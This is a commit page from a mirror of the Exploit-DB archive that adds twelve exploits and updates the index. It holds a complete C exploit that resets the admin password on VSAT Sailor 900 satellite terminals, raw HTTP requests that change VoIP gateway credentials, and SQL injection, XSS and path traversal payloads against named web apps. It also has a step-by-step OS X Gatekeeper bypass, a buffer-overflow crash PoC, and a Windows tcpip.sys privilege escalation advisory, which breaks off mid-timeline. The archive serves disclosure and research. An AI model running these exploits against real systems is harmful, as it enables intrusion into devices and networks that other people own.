bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Update: 2015-01-30

Browse source 
12 new exploits
This commit is contained in:
Offensive Security 2015-01-30 08:36:43 +00:00
parent e216d45120
commit 6ca0dbbc0e
13 changed files with 883 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

12
files.csv
View file

@ -32365,3 +32365,15 @@ id,file,description,date,author,platform,type,port
35922,platforms/php/webapps/35922.txt,"Joomla! 'com_jr_tfb' Component 'controller' Parameter Local File Include Vulnerability",2011-07-05,FL0RiX,php,webapps,0 35922,platforms/php/webapps/35922.txt,"Joomla! 'com_jr_tfb' Component 'controller' Parameter Local File Include Vulnerability",2011-07-05,FL0RiX,php,webapps,0
35923,platforms/asp/webapps/35923.txt,"Paliz Portal Cross Site Scripting and Multiple SQL Injection Vulnerabilities",2011-07-02,Net.Edit0r,asp,webapps,0 35923,platforms/asp/webapps/35923.txt,"Paliz Portal Cross Site Scripting and Multiple SQL Injection Vulnerabilities",2011-07-02,Net.Edit0r,asp,webapps,0
35924,platforms/windows/remote/35924.py,"ClearSCADA - Remote Authentication Bypass Exploit",2015-01-28,"Jeremy Brown",windows,remote,0 35924,platforms/windows/remote/35924.py,"ClearSCADA - Remote Authentication Bypass Exploit",2015-01-28,"Jeremy Brown",windows,remote,0
35925,platforms/hardware/remote/35925.txt,"Portech MV-372 VoIP Gateway Multiple Security Vulnerabilities",2011-07-05,"Zsolt Imre",hardware,remote,0
35926,platforms/asp/webapps/35926.txt,"eTAWASOL 'id' Parameter SQL Injection Vulnerability",2011-07-03,Bl4ck.Viper,asp,webapps,0
35927,platforms/php/webapps/35927.txt,"Classified Script c-BrowseClassified URL Cross Site Scripting Vulnerability",2011-07-05,"Raghavendra Karthik D",php,webapps,0
35928,platforms/windows/remote/35928.html,"Pro Softnet IDrive Online Backup 3.4.0 ActiveX SaveToFile() Arbitrary File Overwrite Vulnerability",2011-07-06,"High-Tech Bridge SA",windows,remote,0
35929,platforms/php/webapps/35929.txt,"Joomla! 'com_voj' Component SQL Injection Vulnerability",2011-07-08,CoBRa_21,php,webapps,0
35930,platforms/php/webapps/35930.txt,"Prontus CMS 'page' Parameter Cross Site Scripting Vulnerability",2011-07-11,Zerial,php,webapps,0
35931,platforms/php/webapps/35931.txt,"ICMusic '1.2 music_id' Parameter SQL Injection Vulnerability",2011-07-11,kaMtiEz,php,webapps,0
35932,platforms/hardware/remote/35932.c,"VSAT Sailor 900 - Remote Exploit",2015-01-29,"Nicholas Lemonias.",hardware,remote,0
35933,platforms/hardware/webapps/35933.txt,"ManageEngine Firewall Analyzer 8.0 - Directory Traversal/XSS Vulnerabilities",2015-01-29,"Sepahan TelCom IT Group",hardware,webapps,0
35934,platforms/osx/local/35934.txt,"OS X < 10.10.x - Gatekeeper bypass Vulnerability",2015-01-29,"Amplia Security Research",osx,local,0
35935,platforms/windows/local/35935.py,"UniPDF 1.1 - Crash PoC (SEH overwritten)",2015-01-29,bonze,windows,local,0
35936,platforms/windows/local/35936.py,"Microsoft Windows Server 2003 SP2 - Privilege Escalation",2015-01-29,KoreLogic,windows,local,0

Can't render this file because it is too large.

7
platforms/asp/webapps/35926.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/48561/info
eTAWASOL is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/npages/back.asp?id=[SQL]

37
platforms/hardware/remote/35925.txt Executable file
View file

@ -0,0 +1,37 @@
source: http://www.securityfocus.com/bid/48560/info
The Portech MV-372 VoIP Gateway is prone to multiple security vulnerabilities.
An attacker may leverage these issues to obtain potentially sensitive information, cause vulnerable devices to crash (resulting in a denial-of-service condition), or bypass certain security restrictions by sending a specially crafted HTTP POST request.
POST http://<device address>/change.cgi HTTP/1.1
Host: <device address>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101
Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: hu-hu,hu;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://192.168.0.100/change.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Nuser=admin&Npass=admin&Nrpass=admin&submit=Submit
POST http://<device address>/save.cgi
Host: <device address>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101
Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: hu-hu,hu;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://192.168.0.100/save.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
submit=Save

255
platforms/hardware/remote/35932.c Executable file
View file

@ -0,0 +1,255 @@
/*
** File : satcompwn.c - [VSAT SAILOR SAT COM 900 Remote 0day]
** Author : Nicholas Lemonias
**
** This is proprietary source code material of Advanced Information Security Corporation.
** Usage, distribution and modifications are pursuant to our terms of agreement.
**
**
** Copyright (c) 2009-2014, Advanced Information Security Corporation as represented by the
** author of this software.
** All rights reserved.
**
**
** This research demo is for academic research purposes ONLY. You may only use this software for
** educational purposes, or for the purpose of academic research.
** This work is copyright protected. You may not, copy, or distribute
** or use this in any other way, without prior authorisation. This work is covered by DMCA and
** other applicable intellectual property laws.
**
** #@#@~ VSAT SAILOR 900 / SATCOM (iDirect/Linux)
**
** Poc Tested on our: iDirect Infiniti VMU/SATCOM v.1.47 Build 9
** Platform Frequency: Ku/Ka band
** Compatible Networks: Jabiru, Inmarsat GX, and Intelsat's Epic
**
*/
/****************************************************************************************
(c) 2014 Advanced Information Security Corporation
*****************************************************************************************/
/*
** Compilation: cc satcompwn.c -o satcompwn
** HOW-TO:
**
** Usage: ./satcompwn <host> <port>\n
**
**
*/
#include <netinet/in.h>
#include <signal.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netdb.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <assert.h>
#include <errno.h>
#include <time.h>
#include <fcntl.h>
#include <sys/time.h>
#include <sys/socket.h>
#define BUFFER_MAX_SIZE 65535
#define BUFFER_MIN_LEN 230
ssize_t payload(int sock, char *hst, char *pg, char *pss)
{
char BUF_SIZE_S[BUFFER_MAX_SIZE + 1], BUF_SIZE_R[BUFFER_MAX_SIZE + 1];
ssize_t n; char *l;
snprintf(BUF_SIZE_S, BUFFER_MIN_LEN,
"POST %s HTTP/1.0\n\n"
"Host: %s\r\n"
"Content-type: application/x-www-form-urlencoded\r\n"
"Content-length: %zu \r\n"
"Cookie: tt_adm=694020\r\n"
"%s \r\n\n", pg, hst, strlen(pss), pss);
if(write(sock,BUF_SIZE_S, strlen(BUF_SIZE_S)) == -1) {
error("Read error");
return -1;
}
printf("\n");
printf("Sending Payload.....\n");
printf("\n\n");
printf("%s", BUF_SIZE_S, sizeof(BUF_SIZE_S));
while ((n =read(sock,BUF_SIZE_R,sizeof(BUF_SIZE_R))) > 0){
BUF_SIZE_R[n] = '\0';
if(n == -1) {
error("Read error");
return -1;
}
if ( strstr(BUF_SIZE_R, "404")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.4.5 - False Positive HTTP ERROR [404] Host is not a V-SAT Sailor 900 terminal.\n\n\n");
if ( strstr(BUF_SIZE_R, "401")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.4.2 - HTTP Unauthorized [401] Unauthorized Access to remote host.\n\n\n");
if ( strstr(BUF_SIZE_R, "500")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.5.1 - HTTP Internal Server Error [500] Internal Server Error - The remote host couldn't recognise the request. This is not a valid SAILOR 900 terminal.\n\n\n");
if ( strstr(BUF_SIZE_R, "303")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.3.4 - HTTP See Other [303] Possible Redirect - The code received says it is temporary under a different URL. This is not a valid SAILOR 900 terminal.\n\n\n");
if ( strstr(BUF_SIZE_R, "307")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.3.8 - HTTP Temporary Redirect [307] Possible Redirect - The requested resource received indicates redirection. This is not a valid SAILOR 900 terminal.\n\n\n");
if ( strstr(BUF_SIZE_R, "403")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.4.4 - HTTP Forbidden [403] The remote server/ understood the request, but is refusing to fulfill it.\n\n\n");
if ( strstr(BUF_SIZE_R, "407")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.4.8 - HTTP Proxy Authentication Required [407] - The remote terminal requires HTTP authentication. If this is a valid SAILOR 900 terminal, it is protected with HTTP authentication.\n\n\n");
if ( strstr(BUF_SIZE_R, "408")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.4.9 - HTTP Request Time out [408] - The client did not produce a request within the time that the server was prepared to wait.\n\n\n");
if ( strstr(BUF_SIZE_R, "503")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.5.4 - HTTP Service Unavailable [503] - Connection Refused. The hostname of the terminal provided is currently unable to handle the request.\n\n\n");
if ( strstr(BUF_SIZE_R, "411")) printf("\n\n[x] Exploit Failed Ref. RFC 2616 - Error 411 - Length Required. This is not a valid SAILOR 900 terminal.\n\n\n");
if ( strstr(BUF_SIZE_R, "400")) printf("\n\n[x] Exploit Failed Ref. RFC 2616 - Error 400 - Bad Request. This is not a valid SAILOR 900 terminal. The request could not be understood by the remote server.\n\n\n");
if ( strstr(BUF_SIZE_R, "301")) printf("\n\n[x] Exploit Failed Ref. RFC 2616 - Error 301 - Moved Permanently. This is not a valid SAILOR 900 terminal. The request could not be understood by the remote server.\n\n\n");
if ( strstr(BUF_SIZE_R, "BAD REQUEST")) printf("\n\n[x] Exploit Failed. This is not a valid SAILOR 900 terminal.\n\n\n");
if ( strstr(BUF_SIZE_R, "202")) {
while ( (l=strstr(BUF_SIZE_R,"Thrane & Thrane")) == NULL ) printf("\n\n[x] Exploit Failed. This is not a valid SAILOR 900 terminal...\n\n\n"); }
else if (strstr(BUF_SIZE_R, "Thrane & Thrane") != NULL && strstr(BUF_SIZE_R, "302") == NULL){
printf("[x] Mission Successful Ref. RFC 2616, 10.2.3 - HTTP Okay [202] The remote host is a V-SAT Sailor 900. Please Login as administrator: user:admin & pass:aisatpwn2134 on %s\n\n\n", hst);
}
}
printf("***********************************************************************\n");
printf("*Advanced Information Security Corporation, 2014 - All Rights Reserved*\n");
printf("***********************************************************************\n");
printf("* Please wait.. I will provide you with some more information below:\n");
printf("***********************************************************************\n");
printf("\n\n\n\n");
printf("%s \n\n", BUF_SIZE_R, sizeof(BUF_SIZE_R));
return n;
}
int main (int argc, char *argv[]) {
char *pg = "/index.lua?pageID=administration";
char *pss = "&usernameAdmChange=admin"
"&passwordAdmChange=aisatpwn2134";
// char *cval = "tt_adm=tt_adm=694020";
long arg;
int sock, opt, evalopt, s;
if(argc < 2)
{
printf("***********************************************************************\n");
printf("(Advanced Information Security Corporation, 2014 - All Rights Reserved*\n");
printf("***********************************************************************\n");
printf("* *\n");
printf("* (V-SAT SAILOR 900 Remote Exploit) *\n");
printf("***********************************************************************\n");
printf("* Disclaimer: This is proprietary source code material of Advanced *\n");
printf("* Information Security Corporation. This software is for *\n");
printf("* research purposes only. *\n");
printf("***********************************************************************\n");
printf("* VSAT Sailor 900 / Tested on iDirect Infiniti VMU v.1.47 Build 9 *\n");
printf("* Description: *\n");
printf("* The Sailor 900 VSAT is an advanced maritime stabilised Ku/Ka band *\n");
printf("* platform with integrated GPS, compatible with a number of satellite *\n");
printf("* networks, such as Jabiru, Inmarsat GX, and Intelsat's Epic. *\n");
printf("***********************************************************************\n");
printf("\n\n");
fprintf(stderr, " Main Menu \n");
fprintf(stderr, " Usage: %s <host> <port>\n", argv[0]);
exit(1);
}
struct timeval tv;
struct sockaddr_in remote;
struct hostent *host;
socklen_t lon;
host = gethostbyname((void *)argv[1]);
fd_set wset;
fd_set rset;
sock = socket(AF_INET,SOCK_STREAM,0);
remote.sin_port = htons(atoi(argv[2]));
remote.sin_addr.s_addr = htonl(INADDR_ANY);
remote.sin_addr.s_addr = ((struct in_addr *)(host->h_addr))->s_addr;
remote.sin_family = AF_INET;
memset(remote.sin_zero,0,sizeof(remote.sin_zero));
fflush(stdout);
if (sock == -1) {
perror("socket creation error");
return -1;
}
FD_ZERO( &wset );
FD_SET( sock , &wset );
FD_ZERO( &rset );
FD_SET( sock , &rset );
tv.tv_sec = 3;
tv.tv_usec = 0;
s = connect(sock,(struct sockaddr *)&remote,sizeof(struct sockaddr));
if (s == -1 ) {
perror("connection ");
return -1;}
if( errno != 0) {
perror("connection ");
return -1;
}
arg = fcntl(sock, F_GETFL, NULL);
arg |= O_NONBLOCK;
fcntl(sock, F_SETFL, arg);
if( fcntl( sock , F_SETFL , O_NONBLOCK ) == -1 ) {
perror("fcntl error");
return -1;
}
opt = select(sock+1,NULL,&wset,NULL,&tv);
if( opt == -1 ) {
perror("select");
return -1;
}
if (opt > 0) {
lon = sizeof(int);
getsockopt(sock, SOL_SOCKET, SO_ERROR, (void*)(&evalopt), &lon);
if (evalopt) {
fprintf(stderr, "Socket Connection Error Code at: %d - %s\n", evalopt, strerror(evalopt));
exit(0);
}
if( fcntl( sock , F_SETFL , 0 ) == -1 ) {
perror("fcntl");
printf("[RST-FCNTL] FCNTL Error. Exiting the software.\n\n");
return -1;
}
if( payload(sock,host->h_name,pg,pss) != 1) printf("\n\n[x] Payload Sent. Please check server responses above to verify status.\n\n");
arg = fcntl(sock, F_GETFL, NULL);
arg &= (~O_NONBLOCK);
fcntl(sock, F_SETFL, arg);
close(sock);
exit(1);
}
}

52
platforms/hardware/webapps/35933.txt Executable file
View file

@ -0,0 +1,52 @@
################################################################################################
# #
# ...:::::ManageEngine Firewall Analyzer Directory Traversal/XSS Vulnerabilities::::.... #
# #############################################################################################
Sobhan System Network & Security Group (sobhansys)
-------------------------------------------------------
# Date: 2015-01-28
# Exploit Author: AmirHadi Yazdani (Sobhansys Co)
# Vendor Homepage: http://www.manageengine.com/products/firewall/
# Demo Link: http://demo.fwanalyzer.com/
#Affected version: <= Build Version : 8.0
About ManageEngine Firewall Analyzer (From Vendor Site) :
ManageEngine Firewall Analyzer is an agent less log analytics and configuration management software
that helps network administrators to centrally collect, archive, analyze
their security device logs and generate forensic reports out of it.
--------------------------------------------------------
I'M hadihadi From Virangar Security Team
special tnx to:MR.nosrati,black.shadowes,MR.hesy
& all virangar members & all hackerz
greetz to My friends In Signal IT Group (www.signal-net.net) & A.Molaei
spl:Z.Khodaee
-------
exploit:
Diretory Traversal :
http://127.0.0.1/fw/mindex.do?url=./WEB-INF/web.xml%3f
http://127.0.0.1/fw/index2.do?completeData=true&helpP=archiveAction&tab=system&url=./WEB-INF/web.xml%3f
http://127.0.0.1/fw/index2.do?helpP=fim&link=0&sel=13&tab=system&url=./WEB-INF/web.xml%3f
XSS :
http://127.0.0.1/fw/index2.do?completeData=true&url=importedLogDetails" onmouseover%3dprompt(902321) bad%3d"
----
Sobhan system Co.
Signal Network And Security Group (www.signal-net.net)
E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net

112
platforms/osx/local/35934.txt Executable file
View file

@ -0,0 +1,112 @@
# Exploit Title: OS X Gatekeeper bypass Vulnerability
# Date: 01-27-2015
# Exploit Author: Amplia Security Research
# Vendor Homepage: www.apple.com
# Version: OS X Lion, OS X Mountain Lion, OS X Mavericks, OS X Yosemite
# Tested on: OS X Lion, OS X Mountain Lion, OS X Mavericks, OS X Yosemite
# CVE : CVE-2014-8826
Advisory URL :
http://www.ampliasecurity.com/advisories/os-x-gatekeeper-bypass-vulnerability.html
Gatekeeper is a feature available in OS X Lion v10.7.5 and later
versions of OS X.
Gatekeeper performs checks on files and applications downloaded from the
Internet to prevent execution of supposedly malicious and
untrusted/unsigned code.
Gatekeeper provides three different settings:
- Mac App Store (Only apps that came from the Mac App Store can open)
- Mac App Store and identified developers (Only apps that came from the
Mac App Store and identified developers using Gatekeeper can open)
- Anywhere
The default setting is "Mac App Store and identified developers".
This setting prevents execution of any code that was not downloaded from
the Mac App Store and that was not digitally signed by a Developer ID
registered with Apple.
For example, If the user downloads an application from an untrusted
source and double-clicks on the application to execute it, OS X
Gatekeeper will prevent its execution with the following warning message:
"<AppName> can't be opened because it is from an unidentified developer."
(For more information on OS X Gatekeeper, see
http://support.apple.com/kb/ht5290)
We found an attacker can bypass OS X Gatekeeper protections and execute
unsigned malicious code downloaded by the user, even if OS X Gatekeeper
is configured to only allow execution of applications downloaded from
the Mac App Store (the highest security setting).
The exploitation technique is trivial and requires Java to be installed
on the victim's machine.
OS X Gatekeeper prevents execution of downloaded Java Jar (.jar) and
class (.class) files, but this verification can be bypassed.
For example:
- Create a JAR file containing the code to be executed
For example,
File AmpliaTest.java:
public class AmpliaTest {
public static void main(String[] args) {
try { Runtime.getRuntime().exec("/usr/bin/touch /tmp/AMPLIASECURITY");
} catch(Exception e) { }
}
}
(This is just an example, of course, arbitrary code can be executed)
$ javac AmpliaTest.java
Be sure to compile the code for a version of Java lower than or equal to
the one available on the target (for example, javac -target 1.6 -source
1.6 AmpliaTest.java; and the compiled code will work on Java versions >=
1.6) .
$ echo "main-class: AmpliaTest" > Manifest
$ jar cmf Manifest UnsignedCode.jar AmpliaTest.class
- Create a .DMG disk image
For example:
$ hdiutil create -size 5m -fs HFS+ -volname AmpliaSecurity AmpliaTest.dmg
- Mount AmpliaTest.dmg
- Rename UnsignedCode.jar to UnsignedCode (just remove the extension)
- Copy UnsignedCode to the AmpliaSecurity volume
- Unmount AmpliaTest.dmg
- Host the file AmpliaTest.dmg on a web server
- Download AmpliaTest.dmg using Safari and open it
- Double-Click on 'UnsignedCode' and the code will be executed bypassing
OS X Gatekeeper checks (the code creates the file /tmp/AMPLIASECURITY).
(Perform the same steps but without removing the .jar extension to
UnsignedCode.jar and OS X Gatekeeper will prevent execution of the Jar file)
Because the file 'UnsignedCode' has no extension, Finder will display a
blank page icon; the Java/JAR icon will not be displayed. The user does
not know he is double-clicking on a JAR file and the file does not look
particularly suspicious. Also, since the unsigned code is distributed
inside a disk image (.DMG) file, there are many things the attacker can
do to gain the trust of the user (include other files, use Finder
background images, etc).

7
platforms/php/webapps/35927.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/48564/info
Classified Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/c-BrowseClassified/q:%5C%22%3E%3Cmarquee%3E%3Ch1%3EXSSed%20By%20r007k17%3C/h1%3E%3C/marquee%3E|p:0|gal:0|typ:|/

7
platforms/php/webapps/35929.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/48621/info
The 'com_voj' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/ [PATH]/index.php?option=com_voj&task=viewCode&id=215 and 1=1

12
platforms/php/webapps/35930.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/48637/info
Prontus CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/prontus_fonasa/antialone.html?page=javascript:alert%28/XSS/%29;//
http://www.example.com/prontus_senado/antialone.html?page=javascript:alert%28/XSS/%29;//
http://www.example.com/p1_rector/antialone.html?page=javascript:alert%28/XSS/%29;//

9
platforms/php/webapps/35931.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/48639/info
ICMusic is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ICMusic 1.2 is vulnerable; other versions may also be affected.
http://www.example.com/demos/icmusic/music.php?music_id=-291+union+all+select+1,@@version,3,4,5,6--

46
platforms/windows/local/35935.py Executable file
View file

@ -0,0 +1,46 @@
# Exploit Title: UniPDF v1.1 BufferOverflow, SEH overwrite DoS PoC
# Google Dork: [none]
# Date: 01/28/2015
# Exploit Author: bonze
# Email: dungvtr@gmail.com
# Vendor Homepage: http://unipdf.com/
# Software Link: http://unipdf.com/file/unipdf-setup.exe (Redirect to: http://unipdf-converter.en.softonic.com/download)
# Version: 1.1
# Tested on: Windows 7 SP1 EN
# CVE : [none]
# Note:
# Function MultiByteToWideChar will overwrite RET and SEH pointer, but I can't make exception occur before StackCookie checking
# Please tell me if you have any ideal
#013E8012 |. 68 00020000 PUSH 200 ; /WideBufSize = 200 (512.)
#013E8017 |. 8D8C24 9C0000> LEA ECX,DWORD PTR SS:[ESP+9C] ; |
#013E801E |. 51 PUSH ECX ; |WideCharBuf
#013E801F |. 52 PUSH EDX ; |StringSize
#013E8020 |. 50 PUSH EAX ; |StringToMap
#013E8021 |. 6A 00 PUSH 0 ; |Options
#013E8023 |. 6A 00 PUSH 0 ; |CodePage = CP_ACP
#013E8025 |. FF15 54B45101 CALL NEAR DWORD PTR DS:[<&KERNEL32.Multi> ; \MultiByteToWideChar
#013E802B |. 8D87 08020000 LEA EAX,DWORD PTR DS:[EDI+208]
# At Offset: 327-> overwrite nSEH
# At Offset: 329-> overwrite SEH
# badchar = 0x22
buff2 = "A" * 325
buff2+= "CC" # nSEH
buff2+= "BB" # SEH
crash2 = "<config>\n"
crash2 += " <current Dat=\"1422420474\" />\n"
crash2 += " <Dat Txt=\""+buff2+"\" />\n"
crash2 += "</config>\n"
# Copy file update.xml to UniPDF Application Folder and run UniPDF.exe
file = open("update.xml","w")
file.write(crash2)
file.close()
print "UniPDF v1.1 Crash PoC by bonze at FPT-IS"
print "Email: dungvtr@gmail.com"
print "File Created"

302
platforms/windows/local/35936.py Executable file
View file

@ -0,0 +1,302 @@
"""
KL-001-2015-001 : Microsoft Windows Server 2003 SP2 Arbitrary Write Privilege Escalation
Title: Microsoft Windows Server 2003 SP2 Arbitrary Write Privilege Escalation
Advisory ID: KL-001-2015-001
Publication Date: 2015.01.28
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt
1. Vulnerability Details
Affected Vendor: Microsoft
Affected Product: TCP/IP Protocol Driver
Affected Version: 5.2.3790.4573
Platform: Microsoft Windows Server 2003 Service Pack 2
Architecture: x86, x64, Itanium
Impact: Privilege Escalation
Attack vector: IOCTL
CVE-ID: CVE-2014-4076
2. Vulnerability Description
The tcpip.sys driver fails to sufficiently validate memory
objects used during the processing of a user-provided IOCTL.
3. Technical Description
By crafting an input buffer that will be passed to the Tcp
device through the NtDeviceIoControlFile() function, it
is possible to trigger a vulnerability that would allow an
attacker to elevate privileges.
This vulnerability was discovered while fuzzing the tcpip.sys
driver. A collection of IOCTLs that could be targeted was
obtained and subsequently fuzzed. During this process, one of
the crashes obtained originated from the IOCTL 0x00120028.
This was performed on an x86 installation of Windows Server
2003, Service Pack 2.
ErrCode = 00000000
eax=00000000 ebx=859ef888 ecx=00000008 edx=00000100 esi=00000000 edi=80a58270
eip=f67ebbbd esp=f620a9c8 ebp=f620a9dc iopl=0 nv up ei pl zr na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246
tcpip!SetAddrOptions+0x1d:
f67ebbbd 8b5e28 mov ebx,dword ptr [esi+28h] ds:0023:00000028=????????
A second chance exception has occurred during a mov
instruction. This instruction is attempting to copy a pointer
value from an un-allocated address space. Since no pointer
can be found, an exception is generated.
Let's begin by reviewing the call stack:
kd> kv
*** Stack trace for last set context - .thread/.cxr resets it
ChildEBP RetAddr Args to Child
f620a9dc f67e416b f620aa34 00000022 00000004 tcpip!SetAddrOptions+0x1d (FPO: [Non-Fpo])
f620aa10 f67e40de f620aa34 859ef888 859ef8a0 tcpip!TdiSetInformationEx+0x539 (FPO: [Non-Fpo])
f620aa44 f67e3b24 85a733d0 85a73440 85a73440 tcpip!TCPSetInformationEx+0x8c (FPO: [Non-Fpo])
f620aa60 f67e3b51 85a733d0 85a73440 85a733d0 tcpip!TCPDispatchDeviceControl+0x149 (FPO: [Non-Fpo])
f620aa98 8081d7d3 85c4b410 85a733d0 85e82390 tcpip!TCPDispatch+0xf9 (FPO: [Non-Fpo])
f620aaac 808ef85d 85a73440 85e82390 85a733d0 nt!IofCallDriver+0x45 (FPO: [Non-Fpo])
f620aac0 808f05ff 85c4b410 85a733d0 85e82390 nt!IopSynchronousServiceTail+0x10b (FPO: [Non-Fpo])
f620ab5c 808e912e 000006f4 00000000 00000000 nt!IopXxxControlFile+0x5e5 (FPO: [Non-Fpo])
f620ab90 f55c10fa 000006f4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a (FPO: [Non-Fpo])
The nt!NtDeviceIoControlFile() function was called, creating
a chain of subsequent function calls that eventually led to
the tcpip!SetAddrOptions() function being called.
By de-constructing the call to nt!NtDeviceIoControlFile() we
can derive all required information to re-create this exception.
0a b940dd34 80885614 nt!NtDeviceIoControlFile+0x2a
eax=00000000 ebx=8c785070 ecx=00000000 edx=00000000 esi=00000000 edi=00000000
eip=808e912e esp=b940dd08 ebp=b940dd34 iopl=0 nv up ei pl zr na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246
nt!NtDeviceIoControlFile+0x2a:
808e912e 5d pop ebp
kd> db [ebp+2C] L?0x4
b940dd60 00 00 00 00 ....
kd> db [ebp+28] L?0x4
b940dd5c 00 00 00 00 ....
kd> db [ebp+24] L?0x4
b940dd58 20 00 00 00 ...
kd> db [ebp+20] L?0x4
b940dd54 00 11 00 00 ....
kd> db [ebp+1c] L?0x4
b940dd50 28 00 12 00 (...
kd> db [ebp+18] L?0x4
b940dd4c 58 4f bd 00 XO..
kd> db [ebp+14] L?0x4
b940dd48 00 00 00 00 ....
kd> db [ebp+10] L?0x4
b940dd44 00 00 00 00 ....
kd> db [ebp+0c] L?0x4
b940dd40 00 00 00 00 ....
kd> db [ebp+8] L?0x4
b940dd3c b8 06 00 00 ....
The inputBuffer for this call references memory at 0x1000 with
a length of 0x20.
kd> db 0x1100 L?0x20
00001100 00 04 00 00 00 00 00 00-00 02 00 00 00 02 00 00 ................
00001110 22 00 00 00 04 00 00 00-00 00 01 00 00 00 00 00 "...............
After review of the tcpip.sys driver, some memory trickery
was created to control the code flow until the instruction
pointer could be controlled in a way that would be beneficial
to an attacker.
kd> db 0x28 L?0x11
00000028 87 ff ff 38 00 00 00 00-00 00 00 00 00 00 00 00 ...8............
00000038 01
eax=00000000 ebx=80a58290 ecx=00000000 edx=00000000 esi=00000000 edi=00000000
eip=0000002a esp=b940db3c ebp=b940db60 iopl=0 nv up ei pl zr na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246
0000002a ff ???
Since the instruction pointer now contains 0x0000002a,
exploitation becomes trivial. Merely allocating the desired
payload for execution at this memory address will allow for
unprivileged users to run their payload within a privileged
process.
4. Mitigation and Remediation Recommendation
The vendor has issued a patch for this
vulnerability, the details of which are presented
in the vendor's public acknowledgment MS14-070
(https://technet.microsoft.com/library/security/MS14-070).
5. Credit
This vulnerability was discovered by Matt Bergin of KoreLogic
Security, Inc.
6. Disclosure Timeline
2014.04.28 - Initial contact; sent Microsoft report and PoC.
2014.04.28 - Microsoft requests PoC.
2014.04.29 - KoreLogic resends PoC from the initial contact
email.
2014.04.29 - Microsoft acknowledges receipt of vulnerability
report.
2014.04.29 - Microsoft opens case 19010 (MSRC 0050929) to
investigate the vulnerability.
2014.04.30 - Microsoft informs KoreLogic that the case is
actively being investigated.
2014.05.30 - Microsoft informs KoreLogic that the case is
actively being investigated.
2014.06.11 - KoreLogic informs Microsoft that 30 business days
have passed since vendor acknowledgment of the
initial report. KoreLogic requests CVE number for
the vulnerability, if there is one. KoreLogic
also requests vendor's public identifier for the
vulnerability along with the expected disclosure
date.
2014.06.24 - KoreLogic informs Microsoft that no response was
received following the 06.11.14 email. KoreLogic
requests CVE number for the vulnerability, if
there is one. KoreLogic also requests vendor's
public identifier for the vulnerability along with
the expected disclosure date.
2014.06.24 - Microsoft replies to KoreLogic that they have
reproduced the vulnerability and are determining
how to proceed with the supplied information.
They are not able to provide a CVE or an expected
disclosure date.
2014.07.02 - 45 business days have elapsed since Microsoft
acknowledged receipt of the vulnerability report
and PoC.
2014.07.17 - KoreLogic requests CVE number for the
vulnerability. KoreLogic also requests vendor's
public identifier for the vulnerability along with
the expected disclosure date.
2014.08.18 - Microsoft notifies KoreLogic that they have a CVE
but are not willing to share it with KoreLogic at
this time.
2014.09.08 - KoreLogic requests CVE number for the
vulnerability. KoreLogic also requests vendor's
public identifier for the vulnerability along with
the expected disclosure date.
2014.09.11 - Microsoft responds saying that the vulnerability
is expected to be disclosed in "a Fall release"
and that "it is currently looking good for
October." Does not provide CVE.
2014.09.24 - Microsoft informs KoreLogic that there was a
packaging issue and that the patch will be pushed
